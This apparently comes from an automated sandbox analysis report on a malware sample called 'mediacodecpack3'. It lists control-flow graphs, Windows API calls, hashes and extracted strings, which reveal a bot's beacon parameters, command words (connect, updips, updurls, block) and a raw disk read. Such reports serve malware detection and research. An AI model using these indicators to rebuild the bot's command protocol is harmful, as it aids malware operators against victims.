                                                                                            • Instruction ID: 0803a86750ce3bfa67440ebc889002f12cef2fd4709075135f1e000b4cf78ef5
                                                                                            • Opcode Fuzzy Hash: 335704bfa687c38aceaefb30423917ec5f7f7f1044a2e313b4b8f30b72fb38a5
                                                                                            • Instruction Fuzzy Hash: F421A271A042099BDF21DBA888846EEBBB8FF09314F1440FAE915E7251E770DE45CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 819 2b92b95-2b92baf 820 2b92bb1-2b92bb9 call 2b9fb20 819->820 821 2b92bc7-2b92bcb 819->821 829 2b92bbf-2b92bc2 820->829 823 2b92bcd-2b92bd0 821->823 824 2b92bdf 821->824 823->824 827 2b92bd2-2b92bdd call 2b9fb20 823->827 825 2b92be2-2b92c11 WSASetLastError WSARecv call 2b9950d 824->825 831 2b92c16-2b92c1d 825->831 827->829 832 2b92d30 829->832 834 2b92c2c-2b92c32 831->834 835 2b92c1f-2b92c2a call 2b9fb20 831->835 836 2b92d32-2b92d38 832->836 838 2b92c34-2b92c39 call 2b9fb20 834->838 839 2b92c46-2b92c48 834->839 844 2b92c3f-2b92c42 835->844 838->844 842 2b92c4a-2b92c4d 839->842 843 2b92c4f-2b92c60 call 2b9fb20 839->843 846 2b92c66-2b92c69 842->846 843->836 843->846 844->839 848 2b92c6b-2b92c6d 846->848 849 2b92c73-2b92c76 846->849 848->849 851 2b92d22-2b92d2d call 2b91996 848->851 849->832 852 2b92c7c-2b92c9a call 2b9fb20 call 2b9166f 849->852 851->832 859 2b92cbc-2b92cfa WSASetLastError select call 2b9950d 852->859 860 2b92c9c-2b92cba call 2b9fb20 call 2b9166f 852->860 865 2b92d08 859->865 866 2b92cfc-2b92d06 call 2b9fb20 859->866 860->832 860->859 869 2b92d0a-2b92d12 call 2b9fb20 865->869 870 2b92d15-2b92d17 865->870 874 2b92d19-2b92d1d 866->874 869->870 870->832 870->874 874->825
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92BE4
                                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02B92C07
                                                                                              • Part of subcall function 02B9950D: WSAGetLastError.WS2_32(00000000,?,?,02B92A51), ref: 02B9951B
                                                                                            • WSASetLastError.WS2_32 ref: 02B92CD3
                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02B92CE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Recvselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 886190287-280543908
                                                                                            • Opcode ID: 40a2da0044f76bf1f4834aae64ced3d907c9388a831652b1819106a2ee47e475
                                                                                            • Instruction ID: e1177850e208d2c78b5c82d0145b8cc18bea4a4511180f6055b6cc775b748118
                                                                                            • Opcode Fuzzy Hash: 40a2da0044f76bf1f4834aae64ced3d907c9388a831652b1819106a2ee47e475
                                                                                            • Instruction Fuzzy Hash: 81416FB1905301AFDF109F78C5147ABBBE9EF94364F1049AEE899C7280EB70D541CB92

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 876 2b9e8a7-2b9e8d2 CreateFileA 877 2b9e8d8-2b9e8ed 876->877 878 2b9e9a3-2b9e9aa 876->878 879 2b9e8f0-2b9e912 DeviceIoControl 877->879 880 2b9e94b-2b9e953 879->880 881 2b9e914-2b9e91c 879->881 884 2b9e95c-2b9e95e 880->884 885 2b9e955-2b9e95b call 2ba26df 880->885 882 2b9e91e-2b9e923 881->882 883 2b9e925-2b9e92a 881->883 882->880 883->880 888 2b9e92c-2b9e934 883->888 886 2b9e999-2b9e9a2 CloseHandle 884->886 887 2b9e960-2b9e963 884->887 885->884 886->878 891 2b9e97f-2b9e98c call 2ba27c5 887->891 892 2b9e965-2b9e96e GetLastError 887->892 893 2b9e937-2b9e93c 888->893 891->886 900 2b9e98e-2b9e994 891->900 892->886 894 2b9e970-2b9e973 892->894 893->893 896 2b9e93e-2b9e94a call 2b9e6fa 893->896 894->891 897 2b9e975-2b9e97c 894->897 896->880 897->891 900->879
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02B9E8C6
                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02B9E904
                                                                                            • GetLastError.KERNEL32 ref: 02B9E965
                                                                                            • CloseHandle.KERNELBASE(?), ref: 02B9E99C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: 89b02391e7b8346f84f73cecd3165ac62f345c0437d44726b233de6ea3fdb1ef
                                                                                            • Instruction ID: fdac0603dae35585beb561387a704e6ff70cea0dd7e3c2d767ff94c70472a7e9
                                                                                            • Opcode Fuzzy Hash: 89b02391e7b8346f84f73cecd3165ac62f345c0437d44726b233de6ea3fdb1ef
                                                                                            • Instruction Fuzzy Hash: 5331A371D00215EFDF24CF99D894BAEBBB8FF05754F6045BAE605A7280D7B09A04CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 922 401951-40d878 GetLocalTime 926 40de86-40df52 StartServiceCtrlDispatcherA 922->926 927 40d87e-40d88c 922->927 929 40e028-40e02e lstrcmpiW 926->929 927->929
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(0040BE00), ref: 00401B4D
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherLocalServiceStartTimelstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 4108452588-3837807730
                                                                                            • Opcode ID: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction ID: c0b6fb2c802bab406561895994aa9e9237411ab6f3462ae67dbec63e80f3bd48
                                                                                            • Opcode Fuzzy Hash: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction Fuzzy Hash: 4121D070904658CBDB048B609E697E63BF4AB06340F0081BAC886F72E2D738890ADB19

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 2b95de1-2b95de4 1 2b95dea-2b95dec 0->1 2 2b95e6d-2b95ec4 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1->2 3 2b95def-2b95df7 1->3 6 2b95ecb-2b960ec GetTickCount call 2b959fa GetVersionExA call 2ba3760 call 2ba1fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2ba3760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba1fbc * 4 QueryPerformanceCounter Sleep call 2ba1fbc * 2 call 2ba3760 * 2 2->6 7 2b95ec6 call 2b942c7 2->7 4 2b95df9-2b95e3b 3->4 5 2b95dbf-2b95dc2 3->5 15 2b95dc5-2b95dcf 4->15 24 2b95e3d-2b95e3e 4->24 8 2b95d61-2b95d78 5->8 9 2b95dc4 5->9 62 2b960f0-2b960f2 6->62 7->6 13 2b95d0b-2b95d15 8->13 14 2b95d7a-2b95d8e 8->14 9->15 17 2b95d18-2b95d1e 13->17 14->17 18 2b95d90 14->18 19 2b95d94-2b95da9 15->19 18->1 22 2b95d92 18->22 19->5 22->19 24->2 63 2b960fb-2b960fd 62->63 64 2b960f4-2b960f9 62->64 66 2b9610a-2b96448 RtlEnterCriticalSection RtlLeaveCriticalSection 63->66 67 2b960ff 63->67 65 2b96104 Sleep 64->65 65->66 69 2b9644a-2b96450 66->69 70 2b96464-2b9646e 66->70 67->65 71 2b96452-2b96454 69->71 72 2b96456-2b96463 call 2b9534d 69->72 70->62 73 2b96474-2b96498 call 2ba3760 call 2b9439c 70->73 71->70 72->70 73->62 80 2b9649e-2b964c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba134c 73->80 83 2b964cb-2b964da call 2ba134c 80->83 84 2b96513-2b9652b call 2ba134c 80->84 83->84 91 2b964dc-2b964eb call 2ba134c 83->91 89 2b96531-2b96533 84->89 90 2b967d2-2b967e1 call 2ba134c 84->90 89->90 93 2b96539-2b965e4 call 2ba1fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba3760 * 5 call 2b9439c * 2 89->93 98 2b967e3-2b967e5 90->98 99 2b96826-2b96835 call 2ba134c 90->99 91->84 101 2b964ed-2b964fc call 2ba134c 91->101 143 2b96621 93->143 144 2b965e6-2b965e8 93->144 98->99 102 2b967e7-2b96821 call 2ba3760 RtlEnterCriticalSection RtlLeaveCriticalSection 98->102 112 2b9684a-2b96859 call 2ba134c 99->112 113 2b96837-2b96845 call 2b95c11 call 2b95d1f 99->113 101->84 114 2b964fe-2b9650d call 2ba134c 101->114 102->62 112->62 123 2b9685f-2b96861 112->123 113->62 114->62 114->84 123->62 127 2b96867-2b96880 call 2b9439c 123->127 127->62 134 2b96886-2b96955 call 2ba1428 call 2b91ba7 127->134 145 2b9695c-2b9697d RtlEnterCriticalSection 134->145 146 2b96957 call 2b9143f 134->146 150 2b96625-2b96653 call 2ba1fbc call 2ba3760 call 2b9439c 143->150 144->143 149 2b965ea-2b965fc call 2ba134c 144->149 147 2b96989-2b969f0 RtlLeaveCriticalSection call 2b93c67 call 2b93d7e call 2b9733f 145->147 148 2b9697f-2b96986 145->148 146->145 171 2b96b58-2b96b6c call 2b98007 147->171 172 2b969f6-2b96a38 call 2b99729 147->172 148->147 149->143 160 2b965fe-2b9661f call 2b9439c 149->160 169 2b96655-2b96664 call 2ba25f6 150->169 170 2b96694-2b9669d call 2ba1f84 150->170 160->150 169->170 183 2b96666 169->183 181 2b967c0-2b967cd 170->181 182 2b966a3-2b966bb call 2ba27c5 170->182 171->62 184 2b96a3e-2b96a45 172->184 185 2b96b22-2b96b53 call 2b973ee call 2b933b2 172->185 181->62 194 2b966bd-2b966c5 call 2b9873b 182->194 195 2b966c7 182->195 187 2b9666b-2b9667d call 2ba1860 183->187 189 2b96a48-2b96a4d 184->189 185->171 201 2b9667f 187->201 202 2b96682-2b96692 call 2ba25f6 187->202 189->189 193 2b96a4f-2b96a94 call 2b99729 189->193 193->185 204 2b96a9a-2b96aa0 193->204 200 2b966c9-2b9676d call 2b99853 call 2b93863 call 2b95119 call 2b93863 call 2b99af9 call 2b99c13 194->200 195->200 227 2b9676f call 2b9380b 200->227 228 2b96774-2b9679f Sleep call 2ba0900 200->228 201->202 202->170 202->187 208 2b96aa3-2b96aa8 204->208 208->208 211 2b96aaa-2b96ae5 call 2b99729 208->211 211->185 217 2b96ae7-2b96b21 call 2b9c11b 211->217 217->185 227->228 232 2b967ab-2b967b9 228->232 233 2b967a1-2b967aa call 2b94100 228->233 232->181 235 2b967bb call 2b9380b 232->235 233->232 235->181
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02BC4FD0), ref: 02B95E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02B95EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02B95EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02B95EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02B95ED8
                                                                                            • GetVersionExA.KERNEL32(02BC4E20), ref: 02B95F05
                                                                                            • _malloc.LIBCMT ref: 02B95F31
                                                                                            • _malloc.LIBCMT ref: 02B95F41
                                                                                            • _malloc.LIBCMT ref: 02B95F4C
                                                                                            • _malloc.LIBCMT ref: 02B95F57
                                                                                            • _malloc.LIBCMT ref: 02B95F62
                                                                                            • _malloc.LIBCMT ref: 02B95F6D
                                                                                            • _malloc.LIBCMT ref: 02B95F78
                                                                                            • _malloc.LIBCMT ref: 02B95F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02B95F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$OQ$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 2374473808-1738318132
                                                                                            • Opcode ID: 01284d3676701df339eb93289850884f6e6549ad174304d8d4b546153b7158a9
                                                                                            • Instruction ID: b9d424135be938240139fbe40611af9e249c28be490067cbb3147160e07ae6a0
                                                                                            • Opcode Fuzzy Hash: 01284d3676701df339eb93289850884f6e6549ad174304d8d4b546153b7158a9
                                                                                            • Instruction Fuzzy Hash: 25A13671D4C3809FD722AF78A854B9BBFE8AF49350F5408ADF588D7241DBB44905CB92

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 459 2b963f5-2b96448 460 2b9644a-2b96450 459->460 461 2b96464-2b9646e 459->461 462 2b96452-2b96454 460->462 463 2b96456-2b96463 call 2b9534d 460->463 464 2b960f0-2b960f2 461->464 465 2b96474-2b96498 call 2ba3760 call 2b9439c 461->465 462->461 463->461 466 2b960fb-2b960fd 464->466 467 2b960f4-2b960f9 464->467 465->464 477 2b9649e-2b964c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba134c 465->477 472 2b9610a-2b96139 RtlEnterCriticalSection RtlLeaveCriticalSection 466->472 473 2b960ff 466->473 470 2b96104 Sleep 467->470 470->472 472->459 473->470 480 2b964cb-2b964da call 2ba134c 477->480 481 2b96513-2b9652b call 2ba134c 477->481 480->481 488 2b964dc-2b964eb call 2ba134c 480->488 486 2b96531-2b96533 481->486 487 2b967d2-2b967e1 call 2ba134c 481->487 486->487 490 2b96539-2b965e4 call 2ba1fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2ba3760 * 5 call 2b9439c * 2 486->490 495 2b967e3-2b967e5 487->495 496 2b96826-2b9682c call 2ba134c 487->496 488->481 498 2b964ed-2b964fc call 2ba134c 488->498 540 2b96621 490->540 541 2b965e6-2b965e8 490->541 495->496 499 2b967e7-2b96821 call 2ba3760 RtlEnterCriticalSection RtlLeaveCriticalSection 495->499 505 2b96831-2b96835 496->505 498->481 511 2b964fe-2b9650d call 2ba134c 498->511 499->464 509 2b9684a-2b96859 call 2ba134c 505->509 510 2b96837-2b96840 call 2b95c11 call 2b95d1f 505->510 509->464 520 2b9685f-2b96861 509->520 523 2b96845 510->523 511->464 511->481 520->464 524 2b96867-2b96880 call 2b9439c 520->524 523->464 524->464 531 2b96886-2b96955 call 2ba1428 call 2b91ba7 524->531 542 2b9695c-2b9697d RtlEnterCriticalSection 531->542 543 2b96957 call 2b9143f 531->543 547 2b96625-2b96653 call 2ba1fbc call 2ba3760 call 2b9439c 540->547 541->540 546 2b965ea-2b965fc call 2ba134c 541->546 544 2b96989-2b969c2 RtlLeaveCriticalSection call 2b93c67 call 2b93d7e 542->544 545 2b9697f-2b96986 542->545 543->542 559 2b969c7-2b969e4 call 2b9733f 544->559 545->544 546->540 557 2b965fe-2b9661f call 2b9439c 546->557 566 2b96655-2b96664 call 2ba25f6 547->566 567 2b96694-2b9669d call 2ba1f84 547->567 557->547 565 2b969e9-2b969f0 559->565 568 2b96b58-2b96b6c call 2b98007 565->568 569 2b969f6-2b96a2a call 2b99729 565->569 566->567 580 2b96666 566->580 578 2b967c0-2b967cd 567->578 579 2b966a3-2b966bb call 2ba27c5 567->579 568->464 576 2b96a2f-2b96a38 569->576 581 2b96a3e-2b96a45 576->581 582 2b96b22-2b96b33 call 2b973ee 576->582 578->464 591 2b966bd-2b966c5 call 2b9873b 579->591 592 2b966c7 579->592 584 2b9666b-2b9667d call 2ba1860 580->584 586 2b96a48-2b96a4d 581->586 589 2b96b38-2b96b53 call 2b933b2 582->589 598 2b9667f 584->598 599 2b96682-2b96692 call 2ba25f6 584->599 586->586 590 2b96a4f-2b96a86 call 2b99729 586->590 589->568 600 2b96a8b-2b96a94 590->600 597 2b966c9-2b966f7 call 2b99853 call 2b93863 591->597 592->597 611 2b966fc-2b96712 call 2b95119 597->611 598->599 599->567 599->584 600->582 601 2b96a9a-2b96aa0 600->601 605 2b96aa3-2b96aa8 601->605 605->605 608 2b96aaa-2b96ae5 call 2b99729 605->608 608->582 614 2b96ae7-2b96b1b call 2b9c11b 608->614 615 2b96717-2b96742 call 2b93863 call 2b99af9 611->615 619 2b96b20-2b96b21 614->619 621 2b96747-2b96757 call 2b99c13 615->621 619->582 623 2b9675c-2b9676d 621->623 624 2b9676f call 2b9380b 623->624 625 2b96774-2b96783 Sleep 623->625 624->625 627 2b9678b-2b9679f call 2ba0900 625->627 629 2b967ab-2b967b9 627->629 630 2b967a1-2b967aa call 2b94100 627->630 629->578 632 2b967bb call 2b9380b 629->632 630->629 632->578
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02B96104
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96120
                                                                                              • Part of subcall function 02BA27C5: _malloc.LIBCMT ref: 02BA27DD
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B964A3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B964B4
                                                                                            • _malloc.LIBCMT ref: 02B9653B
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9654D
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96559
                                                                                            • _malloc.LIBCMT ref: 02B9662A
                                                                                            • _strtok.LIBCMT ref: 02B9665B
                                                                                            • _swscanf.LIBCMT ref: 02B96672
                                                                                            • _strtok.LIBCMT ref: 02B96689
                                                                                            • _free.LIBCMT ref: 02B96695
                                                                                            • Sleep.KERNEL32(000007D0), ref: 02B96779
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B967FF
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96811
                                                                                              • Part of subcall function 02B9873B: __EH_prolog.LIBCMT ref: 02B98740
                                                                                              • Part of subcall function 02B9873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02B987BB
                                                                                              • Part of subcall function 02B9873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02B987D9
                                                                                            • _sprintf.LIBCMT ref: 02B9689B
                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02B96960
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02B96994
                                                                                              • Part of subcall function 02B95C11: _malloc.LIBCMT ref: 02B95C1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                            • API String ID: 753742866-2823103634
                                                                                            • Opcode ID: 457483c3453f37689e1abcd52d177ec6ec87032c06d45f5f9ad04860e7ad8a6e
                                                                                            • Instruction ID: d7f018e925181f174fc20f18817f2e1792d3a82a8fdc9bd4a745086d1309d6ca
                                                                                            • Opcode Fuzzy Hash: 457483c3453f37689e1abcd52d177ec6ec87032c06d45f5f9ad04860e7ad8a6e
                                                                                            • Instruction Fuzzy Hash: 2912353160C3819FEB359F24D860BAFBBE9EFC5314F1048ADE48997291EBB09444CB52

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02B91D11
                                                                                            • GetLastError.KERNEL32 ref: 02B91D23
                                                                                              • Part of subcall function 02B91712: __EH_prolog.LIBCMT ref: 02B91717
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02B91D59
                                                                                            • GetLastError.KERNEL32 ref: 02B91D6B
                                                                                            • __beginthreadex.LIBCMT ref: 02B91DB1
                                                                                            • GetLastError.KERNEL32 ref: 02B91DC6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02B91DDD
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02B91DEC
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B91E14
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02B91E1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                            • API String ID: 831262434-3017686385
                                                                                            • Opcode ID: f9c4fe761219e00e981c264df8fb8ef2a3975daa5cb36733588eab2a06474fe7
                                                                                            • Instruction ID: 695aa47dc5e4e5fd1b8cd44ee7d8056213f684c8a7001f044467dbfb6056a3af
                                                                                            • Opcode Fuzzy Hash: f9c4fe761219e00e981c264df8fb8ef2a3975daa5cb36733588eab2a06474fe7
                                                                                            • Instruction Fuzzy Hash: 99318F719143029FDB11EF28C848B6BBBA9EF84750F5089ADF859C7290DB709849CFD2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B94D8B
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B94DB7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B94DC3
                                                                                              • Part of subcall function 02B94BED: __EH_prolog.LIBCMT ref: 02B94BF2
                                                                                              • Part of subcall function 02B94BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02B94CF2
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B94E93
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B94E99
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B94EA0
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B94EA6
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B950A7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B950AD
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B950B8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B950C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 2062355503-0
                                                                                            • Opcode ID: afbed72ed598976540a229a81139f0185111744ac02cc239036881ad044f85ac
                                                                                            • Instruction ID: 95db8075c80db3e51ea55cc7d0f1d4a293191303362d692824beb4f6ebbcd62b
                                                                                            • Opcode Fuzzy Hash: afbed72ed598976540a229a81139f0185111744ac02cc239036881ad044f85ac
                                                                                            • Instruction Fuzzy Hash: 4EB15D71D0425DDFEF25DFA0D854BEEBBB9AF04318F1040AAE41976280DBB45A49CFA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 736 401301-40135e FindResourceA 737 401360-401362 736->737 738 401367-40137d SizeofResource 736->738 739 401538-40153c 737->739 740 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 738->740 741 40137f-401381 738->741 746 401407-40140b 740->746 741->739 747 40140d-40141d 746->747 748 40141f-401428 GetTickCount 746->748 747->746 750 401491-401499 748->750 751 40142a-40142e 748->751 752 4014a2-4014a8 750->752 753 401430-401438 751->753 754 40148f 751->754 755 4014f0-401525 GlobalAlloc call 401000 752->755 756 4014aa-4014e8 752->756 757 401441-401447 753->757 754->755 764 40152a-401535 755->764 758 4014ea 756->758 759 4014ee 756->759 761 401449-401485 757->761 762 40148d 757->762 758->759 759->752 765 401487 761->765 766 40148b 761->766 762->751 764->739 765->766 766->757
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3019604839-3916222277
                                                                                            • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                            • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                            • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                            • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02B92706
                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02B9272B
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BB3173), ref: 02B92738
                                                                                              • Part of subcall function 02B91712: __EH_prolog.LIBCMT ref: 02B91717
                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02B92778
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02B927D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID: timer
                                                                                            • API String ID: 4293676635-1792073242
                                                                                            • Opcode ID: 1bc7f3047247dcb619e6d1535c0c4bc915be8c24a6252e4ac1298b469f7ef16d
                                                                                            • Instruction ID: 5e87c21ba2f219a1eccc38b859a1d8522b60e13e94c04dd67f1f6a43c7556ed1
